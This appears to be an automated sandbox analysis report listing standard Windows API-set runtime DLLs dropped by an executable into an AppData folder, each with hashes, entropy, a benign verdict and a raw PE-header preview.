SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-core-util-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
